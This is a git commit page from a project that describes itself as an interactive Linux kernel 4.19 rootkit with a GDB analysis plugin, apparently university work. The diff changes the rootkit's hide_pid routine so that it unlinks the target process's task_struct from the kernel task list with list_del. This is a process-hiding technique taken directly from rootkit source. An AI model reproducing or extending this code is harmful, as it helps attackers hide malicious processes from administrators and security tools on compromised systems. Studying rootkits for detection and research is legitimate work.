implements pid removal from task_struct - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit ad0cdde58b84a05277161a2d07019f268f9f5769
parent cc4cd67a573deadfae154a63ae4fd753ca702bb9
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 25 Jan 2021 01:54:15 +0100

implements pid removal from task_struct

Diffstat:
M rootkit/.gitignore  | 1 +
M rootkit/src/pidhide.c  | 4 +++-

2 files changed, 4 insertions(+), 1 deletion(-)
diff --git a/rootkit/.gitignore b/rootkit/.gitignore
@@ -15,3 +15,4 @@
 /rkctl
 /tags
 /*.o.d
+/src/*.o.d
diff --git a/rootkit/src/pidhide.c b/rootkit/src/pidhide.c
@@ -67,8 +67,10 @@ hide_pid(pid_t pid)
     add_pid_to_list(hidden_pids_tail, pid);
 
     task_struct *ts = find_task_by_vid(pid);
-    if (ts)
+    if (ts) {
         DEBUG_INFO("found\n");
+        list_del(&ts->tasks);
+    }
 }
 
 void

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs